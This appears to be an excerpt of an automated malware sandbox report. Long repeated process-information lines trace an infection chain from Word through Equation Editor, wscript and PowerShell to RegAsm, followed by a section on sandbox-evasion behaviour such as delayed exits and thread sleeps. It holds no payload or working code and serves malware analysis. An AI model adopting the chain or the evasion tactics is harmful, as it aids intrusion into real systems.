                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Delayed program exit found
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040F7E2 Sleep,ExitProcess,13_2_0040F7E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,16_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,13_2_0041A7D9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1009Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1845Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6054Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1620Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9351Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1638Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_13-53641
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3764Thread sleep time: -240000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3948Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3892Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3980Thread sleep count: 6054 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3980Thread sleep count: 1620 > 30Jump to behavior
